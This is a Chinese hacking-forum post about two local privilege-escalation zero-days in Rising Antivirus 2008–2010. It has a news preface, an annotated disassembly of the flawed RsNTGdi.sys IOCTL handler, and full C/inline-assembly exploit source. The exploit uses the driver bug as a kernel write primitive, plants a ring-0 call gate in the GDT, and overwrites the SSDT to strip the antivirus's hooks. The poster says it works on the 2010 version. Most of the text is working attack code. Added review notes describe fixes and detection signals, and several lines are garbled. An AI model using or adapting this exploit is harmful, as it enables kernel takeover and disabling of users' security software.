瑞星本地提权0DAY漏洞 通杀09 2010

前言:波兰一家安全组织(www.ntinternals.org)近日公布:瑞星杀毒软件长期存在两个“本地提权”0day安全漏洞,使木马病毒能轻易获得
瑞星用户的系统控制权。国内安全厂商金山和360的技术专家均已确认了这两个漏洞的存在,一旦受到黑客攻击,数千万瑞星用户将丧失对木马病毒的
防御能力,并将导致国内大批政府与企业内网的信息安全面临严重威胁。

曝光者说,瑞星杀毒的这两个漏洞涉及瑞星杀毒软件2008、2009、2010等主要版本,而且利用方式简单、稳定,能使黑客在攻击瑞星用户时获得系统
最高权限。金山工程师李铁军说,这两个漏洞有可能被黑客利用来制造“批量抓鸡工具”;360的石小洪则在电话采访中表示,如果这类漏洞被黑客大
规模利用,会严重威胁到瑞星个人用户的账号和隐私安全。另外一家企业级安全厂商的技术人员谈到了一种更严重的可能性:使用瑞星杀毒的政府机
构和企业用户很可能因此被黑客渗透到内网中,从而危及这类机构的信息安全。
据发现漏洞的国外组织透露,该组织早在2008年9月和2009年4月分别将两个漏洞信息报告给瑞星,但迟迟没看到瑞星修复漏洞,因此才将技术细节曝
光。鉴于漏洞信息已经公开,按照历次0day漏洞攻击爆发的规律,相应的攻击代码很可能会在今后几天内大面积扩散。
截至目前,瑞星公司尚未对有关漏洞一事作出官方回应,也未对用户发布紧急提示。瑞星杀毒软件漏洞的相关信息已在国内相关论坛传播。


 


Kernel module (RsNTGdi.sys) shipped with RISING Antivirus 2008/2009 contains vulnerabilities in the code that handles IOCTL requests. Local exploitation of multiple vulnerabilities allows an attacker to execute arbitrary code in kernel context.
            .text:0001036E ; int __stdcall DispatchControl(int DeviceObject, PIRP Irp)

            .text:0001036E DispatchControl proc near www.hack6.com
            ; IRP_MJ_DEVICE_CONTROL dispatch routine of RsNTGdi.sys (IDA listing, x86).
            ; Field offsets below are read per the 32-bit IRP / IO_STACK_LOCATION
            ; layouts. IoControlCode 83003C0Bh has transfer type METHOD_NEITHER (low
            ; two bits = 3): the I/O manager neither validates nor copies the buffers,
            ; so the driver itself must ProbeForRead/ProbeForWrite the caller's
            ; pointers inside __try/__except. The 83003C0B handler at 00010458 does
            ; neither, which is the flaw the advisory describes.
            .text:0001036E 本文来自hack6谜领域
            .text:0001036E NtStatus = dword ptr -4 www.hack6.com
            .text:0001036E DeviceObject = dword ptr 8
            .text:0001036E Irp = dword ptr 0Ch 内容来自www.hack6.com
            .text:0001036E                 push ebp
            .text:0001036F                 mov     ebp, esp本文来自hack6谜领域
            .text:00010371                 push ecx 本文来自hack6谜领域
            .text:00010372                 push ebx
            .text:00010373                 push esi 内容来自www.hack6.com
            ; esi = Irp
            .text:00010374                 mov     esi, [ebp+Irp] 内容来自www.hack6.com
            ; NtStatus = STATUS_SUCCESS
            .text:00010377                 and     [ebp+NtStatus], 0 内容来自www.hack6.com
            .text:0001037B                 push edi
            ; ecx = Irp->Tail.Overlay.CurrentStackLocation
            .text:0001037C                 mov     ecx, [esi+60h]
            ; Irp->IoStatus.Information = 0
            .text:0001037F                 and     dword ptr [esi+1Ch], 0
            ; edi = Irp->UserBuffer: the caller's raw output pointer under METHOD_NEITHER
            .text:00010383                 mov     edi, [esi+3Ch]
            ; eax = Parameters.DeviceIoControl.Type3InputBuffer: the caller's raw input pointer
            .text:00010386                 mov     eax, [ecx+10h] www.hack6.com
            ; edx = InputBufferLength
            .text:00010389                 mov     edx, [ecx+8]
            ; ebx = OutputBufferLength
            .text:0001038C                 mov     ebx, [ecx+4] 本文来自hack6谜领域
            ; ecx = IoControlCode
            .text:0001038F                 mov     ecx, [ecx+0Ch]
            .text:00010392                 cmp     ecx, 83003C03h
            ; the Irp stack slot is reused to hold OutputBufferLength
            .text:00010398                 mov     [ebp+Irp], ebx
            .text:0001039B                 jz    @@ioctl_83003C03
            .text:000103A1                 cmp     ecx, 83003C07h
            .text:000103A7                 jz    @@ioctl_83003C07 本文来自hack6谜领域
            .text:000103AD                 cmp     ecx, 83003C0Bh
            .text:000103B3                 jz    @@ioctl_83003C0B
            .text:000103B9                 cmp     ecx, 83003C0Fh
            .text:000103BF                 jz    short @@ioctl_83003C0F
            .text:000103C1                 cmp     ecx, 83003C13h
            .text:000103C7                 jz    short @@ioctl_83003C13
            .text:000103C9                 cmp     ecx, 83003C17h
            .text:000103CF                 jz    short @@ioctl_83003C17
            ; unknown code: NtStatus = STATUS_INVALID_PARAMETER
            .text:000103D1                 mov     [ebp+NtStatus], 0C000000Dh
            .text:000103D8                 jmp     @@complete_request www.hack6.com
            ; (the other handlers are omitted in the advisory excerpt)
            ... 内容来自www.hack6.com
            .text:00010458 @@ioctl_83003C0B: 内容来自www.hack6.com
            ; ebx = 4; a minimum length is the only validation applied to either buffer
            .text:00010458                 push 4
            www.hack6.com
            .text:0001045A                 pop     ebx
            内容来自www.hack6.com
            ; InputBufferLength < 4 -> complete the request (status still 0, Information 0)
            .text:0001045B                 cmp     edx, ebx 内容来自www.hack6.com
            .text:0001045D                 jb    short @@complete_request www.hack6.com
            ; OutputBufferLength < 4 -> same
            .text:0001045F                 cmp     [ebp+Irp], ebx
            内容来自www.hack6.com
            .text:00010462                 jb    short @@complete_request www.hack6.com
            ; FLAW: dereferences Type3InputBuffer with no ProbeForRead and no SEH
            .text:00010464                 push dword ptr [eax] 本文来自hack6谜领域
            .text:00010466                 call VidSetTextColor
            www.hack6.com
            ; FLAW: stores the result through UserBuffer with no ProbeForWrite and no
            ; SEH, so a user-mode caller chooses an arbitrary kernel address to write.
            ; Fix: probe both pointers under __try/__except, or define the code with
            ; METHOD_BUFFERED so the I/O manager copies the buffers.
            .text:0001046B                 mov     [edi], eax 本文来自hack6谜领域
            ; Irp->IoStatus.Information = 4
            .text:0001046D                 mov     [esi+1Ch], ebx
            内容来自www.hack6.com
            .text:00010470                 jmp     short @@complete_request 内容来自www.hack6.com


----------------------------------------------------------------------------------------

[VC代码] 瑞星本地漏洞利用代码

 

编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和2008版本
代码:

//My website:http://www.hack6.com 内容来自www.hack6.com

//MY QQ:283422135
//VC-ConsoleWithApi
#include "stdafx.h"
#include "windows.h"
// Undocumented SystemInformationClass value; main() passes it (as the literal
// 11) to NtQuerySystemInformation to enumerate loaded kernel modules.
enum { SystemModuleInformation = 11 };
// One entry of the SystemModuleInformation result (32-bit layout).
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;          // load address of the module (main() uses it to rebase the kernel)
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;   // offset of the file name inside ImageName (see ntosname in main)
CHAR ImageName[256]; // full path of the module
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
// Result header: Count followed by Count entries. Declared with room for a
// single entry; main() queries with exactly sizeof(ModuleInfo) and only reads
// Module[0].
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
// Handle to the RsNTGdi device, opened in main() and used by WriteKVM().
HANDLE g_RsGdiHandle = 0 ;
// Kernel write primitive: stores the 32-bit Value at kernel address Address by
// way of RsNTGdi IOCTL 0x83003C0B. The code is METHOD_NEITHER, so the driver
// receives the raw output pointer and (see the listing above) writes through it
// after a length check only. Two calls are issued: the first with a harmless
// local output buffer, the second with Address as the "output buffer".
// Presumably VidSetTextColor returns the previous value, so the first call
// primes it with Value and the second call stores Value at Address — confirm.
// Neither DeviceIoControl result is checked, so a failed write is silent.
// Driver-side fix: ProbeForRead/ProbeForWrite under __try/__except, or define
// the IOCTL with METHOD_BUFFERED.
void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
ULONG ColorValue = Value ;   // input buffer: the value handed to the driver
ULONG btr ;                  // bytes returned; never read
ULONG ColorBuffer = 0 ;      // output buffer for the priming call

// First call: output lands in a local; only the input value matters here.
DeviceIoControl(g_RsGdiHandle ,
0x83003C0B,
&ColorValue ,
sizeof(ULONG),
&ColorBuffer ,
sizeof(ULONG),
&btr ,
0
);
// Second call: the output pointer is the target kernel address.
DeviceIoControl(g_RsGdiHandle ,
0x83003C0B,
&ColorValue ,
sizeof(ULONG),
Address ,
sizeof(ULONG),
&btr ,
0
);
return ;
}
// Installs a ring-0 call gate into the current CPU's GDT using WriteKVM().
// Bytes written (16 bytes at GDT base + 0x3e0, built in CallGateData):
//   +0x3e0: 32-bit call gate, selector 0x3E8, 0 parameters, access 0xEC
//           (present, DPL 3), target offset = the GDT base address itself;
//   +0x3e8: flat ring-0 code segment (limit 0xFFFFF, access 0x9A, G and D set).
// Before that, 0xC3 is written at the GDT base, so the gate target is a byte
// that executes as a near `ret`; presumably the CPU never consults the null
// descriptor, so overwriting it is tolerated — confirm. IntoR0() enters the
// gate with selector 0x3E3 (0x3E0 | RPL 3).
// NOTE(review): the GDT is per processor, so this is only valid on the CPU the
// thread currently runs on; see the affinity call in main().
// Defender's view: a call gate or a non-zero null descriptor appearing in the
// GDT is a strong integrity signal for this class of attack.
void AddCallGate()
{
ULONG Gdt_Addr;
ULONG CallGateData[0x4]; // the 16 descriptor bytes assembled below
ULONG Icount;            // loop offset, saved across the WriteKVM call
// sgdt stores limit:16 then base:32; storing at esp-2 puts the base in the
// 4 bytes at esp, which the pop retrieves into edx.
__asm
{
push edx
sgdt [esp-2]
pop edx
mov Gdt_Addr , edx
}
__asm
{ 本文来自hack6谜领域

push 0xc3
push Gdt_Addr
call WriteKVM                               // WriteKVM(Gdt_Addr, 0xc3): `ret` byte at the gate target
mov eax,Gdt_Addr
mov word ptr[CallGateData],ax               // gate offset, low 16 bits
shr eax,16
mov word ptr[CallGateData+6],ax             // gate offset, high 16 bits
mov dword ptr[CallGateData+2],0x0ec0003e8   // selector 03E8h, 0 params, access 0ECh
mov dword ptr[CallGateData+8],0x0000ffff    // code segment: base 0, limit low 0FFFFh
mov dword ptr[CallGateData+12],0x00cf9a00   // code segment: access 9Ah, flags 0CFh
xor eax,eax
LoopWrite:
mov edi,dword ptr CallGateData[eax]         // next descriptor dword

www.hack6.com

push edi                                    // Value
mov edi,Gdt_Addr
add edi,0x3e0
add edi,eax
push edi                                    // Address = GDT base + 0x3e0 + eax
mov Icount,eax                              // eax is not preserved across the call
call WriteKVM
mov eax,Icount
add eax , 0x4
cmp eax,0x10
jnz LoopWrite                               // four dwords: 0, 4, 8, 0Ch
} www.hack6.com

return ;
}
// Runs `function` at ring 0 through the call gate installed by AddCallGate().
// Callgt is a 48-bit far pointer {offset 0, selector 0x3E3}: GDT index 0x7C
// (byte offset 0x3E0) with RPL 3, i.e. the gate; the offset part is ignored
// for a call gate.
// How the block reads (confirm on a live trace): the gate target is the `ret`
// byte placed at the GDT base, so the far call returns to the instruction
// following it while still at ring 0, on the ring-0 stack. The code then
// switches esp to the ring-3 stack pointer that the privilege transition saved
// there, calls `function`, restores the ring-0 esp and does a far return that
// drops back to ring 3 at ring3Ret.
void IntoR0(PVOID function)
{
WORD Callgt[3];
Callgt[0] = 0;       // offset, low word (ignored by a call gate)
Callgt[1] = 0;       // offset, high word
Callgt[2] = 0x3e3;   // selector: index 0x7C, GDT, RPL 3
__asm
{
call fword ptr[Callgt]   // far call through the gate; execution resumes here at ring 0
mov eax,esp              // eax = ring-0 stack pointer
mov esp,[esp+4]          // switch to the ring-3 esp saved by the transition
push eax                 // keep the ring-0 esp for the way back
call function            // run the payload at ring 0 on the user stack
pop esp                  // back onto the ring-0 stack
push offset ring3Ret     // return EIP for the far return
retf                     // pops EIP:CS, then ESP:SS (privilege change) -> ring 3
ring3Ret:
nop
}
return ;

}
// Packed 6-byte descriptor-table register image (16-bit limit, 32-bit base).
// Not referenced anywhere else in this listing.
#pragma pack(1)
typedef struct _IDTR
{
SHORT IDTLimit;
UINT IDTBase;
}IDTR,
*PIDTR,
**PPIDTR;
#pragma pack()
ULONG g_RealSSDT = 0 ;        // unused in this listing
ULONG ServiceNum = 0 ;        // number of service-table entries to restore (set in main)
ULONG OrgService [0x1000] ;   // original service addresses collected in main
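// Converts an RVA of a PE image (described by its NT headers) to a file offset.
// RVAs that lie before the first section's raw data belong to the headers,
// which sit at the same offset in the file, so such an RVA is returned as is.
// Returns 0 when no section contains the RVA. Not called elsewhere in this
// listing.
// NOTE(review): the listing as published had lost the `[i]` subscripts on
// Img (apparently eaten by forum markup), which made it uncompilable; they are
// restored here. A zero section count is also handled instead of reading a
// non-existent section header.
ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
{
IMAGE_SECTION_HEADER *Img = IMAGE_FIRST_SECTION(NT);
WORD i;

// Header region (or no sections at all): file offset equals the RVA.
if (NT->FileHeader.NumberOfSections == 0 || Rva < Img->PointerToRawData)
return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
{
// Sections with no raw data (e.g. uninitialised data) report a zero raw
// size; fall back to the virtual size so they still match.
ULONG Limit = Img[i].SizeOfRawData ? Img[i].SizeOfRawData : Img[i].Misc.VirtualSize;

if (Rva >= Img[i].VirtualAddress && Rva < (Img[i].VirtualAddress + Limit))
{
ULONG Offset = Rva;
// A section without raw data has no file offset; keep the RVA unchanged
// (same behaviour as the original).
if (Img[i].PointerToRawData != 0)
{
Offset -= Img[i].VirtualAddress;
Offset += Img[i].PointerToRawData;
}
return Offset;
}
}
return 0;
}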
// Textual helper: `ibaseDD[x]` expands to `*(PDWORD)&ibase[x]`, i.e. the DWORD
// stored at ibase + x (the index binds to ibase before the cast). Kept for
// compatibility; GetHeaders below spells the access out directly.
#define ibaseDD *(PDWORD)&ibase
// Validates the PE headers of the image mapped at ibase and hands back its
// file header, optional header and first section header through the out
// parameters. Returns TRUE on success, FALSE if the MZ or PE signature or the
// 32-bit optional-header magic does not match. *pfh and *poh are already
// assigned when the magic check fails; *psh is only set on success.
// NOTE(review): e_lfanew is not range-checked, so this trusts the caller to
// pass a well-formed mapping. The section table is located at a fixed
// sizeof(IMAGE_OPTIONAL_HEADER) past the optional header rather than via
// SizeOfOptionalHeader, same as the original.
DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
{
PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ibase;
if (dos->e_magic != IMAGE_DOS_SIGNATURE)
return FALSE;
// "PE\0\0" must sit at e_lfanew.
if (*(PDWORD)(ibase + dos->e_lfanew) != IMAGE_NT_SIGNATURE)
return FALSE;
PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(ibase + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE)
return FALSE;
// File header follows the 4-byte signature; optional header follows it.
PIMAGE_FILE_HEADER fileHdr = (PIMAGE_FILE_HEADER)((PBYTE)nt + sizeof(IMAGE_NT_SIGNATURE));
PIMAGE_OPTIONAL_HEADER optHdr = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileHdr + sizeof(IMAGE_FILE_HEADER));
*pfh = fileHdr;
*poh = optHdr;
if (optHdr->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC)
return FALSE;
*psh = (PIMAGE_SECTION_HEADER)((PBYTE)optHdr + sizeof(IMAGE_OPTIONAL_HEADER));
return TRUE;
}
// One base-relocation entry as stored in a .reloc block: 12-bit offset within
// the block's page, 4-bit type (IMAGE_REL_BASED_*).
typedef struct {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
// base + offset as a pointer. 32-bit arithmetic; this listing is x86-only.
#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset))) www.hack6.com
// Locates KiServiceTable inside the user-mode mapping of the kernel image at
// hModule. dwKSDT is the RVA of KeServiceDescriptorTable. The function walks
// the image's base relocations looking for a HIGHLOW fixup whose patched value
// points at dwKSDT and whose two preceding bytes are C7 05, i.e. the disp32 of
// a `mov dword ptr [KeServiceDescriptorTable], imm32`; the imm32 following the
// fixup is the address of KiServiceTable. Returns that address as an RVA
// (imm32 - ImageBase) and stores the link-time ImageBase through *ImageBase;
// returns 0 when nothing matches.
// NOTE(review): the GetHeaders() result is ignored, so on a malformed image
// pfh/poh are read uninitialised. The walk is bounded only by a zero
// VirtualAddress terminator, not by the relocation directory's size, and the
// reads at hModule+dwPointerRva-2 and +4 are not range-checked. dwFixups is
// counted but never used.
DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
{
PIMAGE_FILE_HEADER pfh;
PIMAGE_OPTIONAL_HEADER poh;
PIMAGE_SECTION_HEADER psh;
PIMAGE_BASE_RELOCATION pbr;   // current relocation block
PIMAGE_FIXUP_ENTRY pfe;       // current entry inside that block

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
BOOL bFirstChunk; www.hack6.com

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh); www.hack6.com

// Only usable if the image has a relocation directory that was not stripped.
if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
       (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {
       pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
       // bFirstChunk forces the first block through even if its VirtualAddress is 0.
       bFirstChunk=TRUE;
       while (bFirstChunk || pbr->VirtualAddress) {
         bFirstChunk=FALSE;

         // Entries start right after the block header.
         pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION)); 内容来自www.hack6.com

         // (SizeOfBlock - header) / 2 = number of 16-bit entries in the block.
         for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
            if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
                   dwFixups++;
                   // RVA of the patched dword, and the RVA it points at.
                   dwPointerRva=pbr->VirtualAddress+pfe->offset;
                   dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;
  
                   if (dwPointsToRva==dwKSDT)
    {
                     // Opcode bytes C7 05 precede the disp32 of `mov [mem32], imm32`.
                     if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

www.hack6.com


   {
                        // imm32 sits right after the 4-byte displacement.
                        dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
   *ImageBase = poh->ImageBase;
                        return dwKiServiceTable;
                     }
                   }
                 
            }
         }
         // Advance to the next block by treating the pointer as an integer.
         *(PDWORD)&pbr+=pbr->SizeOfBlock;
       }
}

return 0;
}
DWORD CR0Reg ;     // saved CR0 so write protection can be restored afterwards
ULONG realssdt ;   // kernel VA of KeServiceDescriptorTable (computed in main)
// Ring-0 payload run through IntoR0(): overwrites the first ServiceNum entries
// of the kernel's service table with the addresses gathered in OrgService,
// i.e. it removes whatever hooks the antivirus placed in the SSDT.
// Interrupts are disabled and CR0.WP (bit 16, mask 0xFFFEFFFF) is cleared so
// the read-only table can be written; both are restored on the way out.
// *(ULONG*)realssdt reads the first field of KeServiceDescriptorTable, which
// is taken to be the pointer to the service table — confirm for the target
// build.
// NOTE(review): as printed, `= OrgService` assigns the whole array to a ULONG
// (forum markup appears to have dropped a subscript), so this does not compile
// verbatim; main() has the same issue.
// Defender's view: SSDT entries changing and CR0.WP being toggled from a
// user-initiated path are the observable effects of this block.
void InKerneProc()
{
__asm
{
cli
mov eax, cr0
mov CR0Reg,eax
and eax,0xFFFEFFFF   // clear WP
mov cr0, eax
}
int i;
for (i = 0; i < (int)ServiceNum; i++)
{
*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;
}
__asm
{
mov eax, CR0Reg   
mov cr0, eax
sti
}

}
// Entry point. Sequence: open the RsNTGdi device; find the running kernel image
// and its load address via NtQuerySystemInformation; map the same kernel file
// into this process with LoadLibrary to locate KiServiceTable and read its
// original entries; then enter ring 0 through the call gate and restore the
// table (InKerneProc). Every failure path returns 0 silently, and neither the
// device handle nor the library mapping is released.
int main(int argc, char* argv[])
{
// NOTE(review): "/n" looks like a transcription artefact for "\n".
printf("Rising AntiVirus 2008 ~ 2010 /n"
"Local Privilege Escalation Vulnerability Proof Of Concept Exploit/n 2010-1-27/n");
// NOTE(review): the device path below has been mangled by the forum's [url]
// markup; the original string is not recoverable from this listing.
// Desired access is 0: the IOCTL's access bits (bits 14-15 of 0x83003C0B)
// are FILE_ANY_ACCESS, so no rights are needed to issue it. Requiring
// FILE_READ_ACCESS/FILE_WRITE_ACCESS in the IOCTL definition would at least
// limit who can open the device usefully.
    g_RsGdiHandle = CreateFile("[url=].//RSNTGDI[/url]" ,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
0,
OPEN_EXISTING , 0 , 0 );
if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
{
return 0 ;
}

SYSTEM_MODULE_INFORMATION ModuleInfo ; 本文来自hack6谜领域

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address www.hack6.com

HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");
ULONG infosize = sizeof(ModuleInfo); www.hack6.com

// NtQuerySystemInformation(11 /* SystemModuleInformation */, &ModuleInfo,
// infosize, NULL), called through the raw pointer (stdcall: arguments pushed
// right to left). The buffer has room for one entry and the returned status is
// not checked; presumably the first entry is always the kernel — confirm.
__asm
{
push 0
push infosize
lea eax , ModuleInfo
push eax
push 11
call pNtQuerySystemInformation
} www.hack6.com

HMODULE KernelHandle ;
// File-name part of the kernel path: PathLength is the offset of the base name.
LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified
// (mapped into this process only so its headers and tables can be parsed)
KernelHandle = LoadLibrary(ntosname);
if (KernelHandle == 0 )
{
return 0 ;
}

// VA of the exported KeServiceDescriptorTable inside the user-mode mapping.
ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

www.hack6.com

if (KeSSDT == 0 )
{
return 0 ;
}
ULONG ImageBase = 0 ;
// Pass the RVA of KeServiceDescriptorTable; get back the RVA of KiServiceTable
// and the link-time ImageBase.
ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);
if (KiSSDT == 0 )
{
return 0 ;
}
KiSSDT += (ULONG)KernelHandle;   // VA of KiServiceTable in the user-mode mapping
// NOTE(review): hard-coded entry count (0x11c = 284). The service count differs
// between Windows versions, so this is presumably tuned to one target build
// — confirm.
ServiceNum = 0x11c ;
ULONG i ;
// Each file entry is an absolute address relative to the link-time ImageBase;
// rebase it to the address the kernel is actually loaded at.
// NOTE(review): `OrgService =` as printed assigns to the array itself; the
// forum markup appears to have dropped a subscript here (see InKerneProc).
for (i = 0 ; i < ServiceNum ; i ++)
{
OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;
}

// Kernel VA of KeServiceDescriptorTable: its RVA in the mapping plus the real load base.
realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;
// NOTE(review): the GDT is per processor, so the intent is presumably to pin
// the thread to one CPU before AddCallGate/IntoR0; a mask of 0 is rejected by
// SetThreadAffinityMask, so the thread is not actually pinned — confirm.
SetThreadAffinityMask(GetCurrentThread () , 0 ) ;
AddCallGate();
IntoR0(InKerneProc);
return 0;
}